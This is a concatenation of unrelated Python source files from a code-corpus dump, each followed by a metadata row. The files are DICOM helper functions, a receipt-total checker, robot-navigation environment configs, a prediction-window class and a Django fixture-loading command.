                   (8, 1): int8,
                   (16, 0): uint16,
                   (16, 1): int16}
    key = (bits_allocated, pixel_representation)
    if key not in dtype_table:
        raise ValueError('Unsupported value type, bits_allocated = %d' % bits_allocated)
    return dtype_table[key]
# -----------------------------------------------------------------------------
#
def unique_prefix_length(strings):
    '''
    Return the shortest prefix length n such that the n-character prefixes of
    the distinct strings are all different.  Falls back to the length of the
    longest string when no shorter prefix distinguishes them.
    '''
    distinct = set(strings)
    longest = max(len(s) for s in distinct)
    return next((n for n in range(longest)
                 if len({s[:n] for s in distinct}) == len(distinct)),
                longest)
# -----------------------------------------------------------------------------
#
def find_reference_series(series):
    '''
    For each series whose ref_plane_uids matches another series' plane_uids,
    set its refers_to_series attribute to that series.  Series without a
    match are left untouched.
    '''
    by_plane_uids = {s.plane_uids: s for s in series}
    for s in series:
        referenced = s.ref_plane_uids
        if referenced and referenced in by_plane_uids:
            s.refers_to_series = by_plane_uids[referenced]
| HamineOliveira/ChimeraX | src/bundles/dicom/src/dicom_format.py | dicom_format.py | py | 20,783 | python | en | code | null | github-code | 13 |
19435659017 | import sys
# Fast line-based stdin reader (competitive-programming idiom).
input = sys.stdin.readline

# First line: the total printed on the receipt; second line: number of items.
declared_total = int(input())
item_count = int(input())

# Recompute the total as the sum of price * quantity for every item line.
computed_total = 0
for _ in range(item_count):
    price, quantity = map(int, input().split())
    computed_total += price * quantity

print('Yes' if declared_total == computed_total else 'No')
26503973043 | import os
# Directory containing this file; used to resolve robot XML paths so they
# work regardless of the process's current working directory.
BASE_DIR = os.path.dirname(os.path.abspath(__file__))

# Base configuration: point robot that must reach a goal while avoiding
# hazard circles.  Keys appear to follow the safety-gym Engine config
# conventions -- confirm against the consuming environment.
point_goal_config = {
    'robot_base': os.path.join(BASE_DIR, 'xmls/point.xml'),
    'action_scale': [1.0, 0.05],
    'task': 'goal',
    'lidar_num_bins': 16,
    'lidar_alias': True,
    'constrain_hazards': True,
    'constrain_indicator': True,
    'hazards_num': 4,
    'hazards_keepout': 0.4,
    'hazards_size': 0.15,
    'hazards_cost': 1.0,
    'goal_keepout': 0.4,
    'goal_size': 0.3,
    '_seed': None
}

# Car robot variant: same task, different chassis and action scaling.
car_goal_config = {
    **point_goal_config,
    # Anchor to BASE_DIR like the point config; the previous bare relative
    # path broke when the process ran from a different working directory.
    'robot_base': os.path.join(BASE_DIR, 'xmls/car.xml'),
    'action_scale': [1.0, 0.02],
}

# Quadruped ("doggo") variant: fewer, smaller hazards and ankle touch sensors.
doggo_goal_config = {
    **point_goal_config,
    # Anchored to BASE_DIR for the same reason as car_goal_config above.
    'robot_base': os.path.join(BASE_DIR, 'xmls/doggo.xml'),
    'action_scale': 1.0,  # NOTE(review): scalar here vs. 2-element list above -- confirm intended
    'hazards_num': 2,
    'hazards_size': 0.1,
    'hazards_keepout': 0.5,
    'goal_keepout': 0.5,
    'sensors_obs':
        ['accelerometer', 'velocimeter', 'gyro', 'magnetometer'] +
        [
            'touch_ankle_1a', 'touch_ankle_2a',
            'touch_ankle_3a', 'touch_ankle_4a',
            'touch_ankle_1b', 'touch_ankle_2b',
            'touch_ankle_3b', 'touch_ankle_4b'
        ]
}

# Simplified layout: one large fixed hazard, hazard positions observed
# directly (SimpleEngine specific options at the bottom).
point_goal_config_simple = {
    'robot_base': os.path.join(BASE_DIR, 'xmls/point.xml'),
    'action_scale': [1.0, 0.05],
    'task': 'goal',
    'lidar_num_bins': 16,
    'lidar_alias': False,
    'constrain_hazards': True,
    'constrain_indicator': False,
    'hazards_num': 1,
    'hazards_keepout': 1.1,
    'hazards_size': 1.0,
    'hazards_cost': 3.0,
    'hazards_locations': [[0.0, 0.0]],
    'robot_keepout': 0.1,
    'goal_keepout': 0.3,
    'goal_size': 0.2,
    # SimpleEngine specific
    'observe_hazards_pos': True,
    '_seed': None
}
| jjyyxx/srlnbc | srlnbc/env/config.py | config.py | py | 1,677 | python | en | code | 15 | github-code | 13 |
14595964245 | from . import utils
from datetime import datetime, timedelta
class Predict:
    '''
    Serves slices of a pre-computed prediction series, indexed by wall-clock
    time relative to a configurable start time.
    '''

    def __init__(self, predict_file, predict_data_interval, horizon, logger):
        # predict_data_interval: minutes between consecutive prediction points.
        # horizon: how many minutes ahead get_predict_value() looks.
        self.predict_data_interval = predict_data_interval
        self.logger = logger
        self.horizon = horizon
        self.predict_data = utils.load_json_file(predict_file)
        self.start_time = datetime.now()

    def set_start_time(self, ts):
        '''Re-anchor the prediction timeline at ts.'''
        self.start_time = ts

    def get_predict_value(self):
        '''Return the prediction points covering (now, now + horizon].'''
        window_start = datetime.now()
        window_end = window_start + timedelta(minutes=self.horizon)
        seconds_per_point = 60 * self.predict_data_interval
        first = int((window_start - self.start_time).total_seconds() / seconds_per_point)
        last = int((window_end - self.start_time).total_seconds() / seconds_per_point)
        result = self.predict_data[first + 1:last + 1]
        self.logger.info('get predict result, length = %d, predict result = %s' % (len(result), str(result)))
        return result
| AgentGuo/PASS | e2e_test/predict_with_performance_model_exp/predict.py | predict.py | py | 961 | python | en | code | 0 | github-code | 13 |
73473285137 | import json
from django.core.management import BaseCommand
from recipes.models import Ingredient
# Maps each model class to the JSON fixture file (under data/) that seeds it.
TABLES = {
    Ingredient: 'ingredients.json',
}
class Command(BaseCommand):
    '''Management command that loads the JSON fixtures listed in TABLES.'''

    def handle(self, *args, **kwargs):
        for model, fixture_name in TABLES.items():
            with open(f'data/{fixture_name}', 'r', encoding='utf-8') as fixture:
                records = json.loads(fixture.read())
            # Existing rows are left untouched thanks to ignore_conflicts.
            model.objects.bulk_create(
                (model(**record) for record in records),
                ignore_conflicts=True)
        self.stdout.write(self.style.SUCCESS('Все данные загружены'))
| unnamestr/foodgram-project-react | backend/recipes/management/commands/load_data.py | load_data.py | py | 614 | python | en | code | 0 | github-code | 13 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.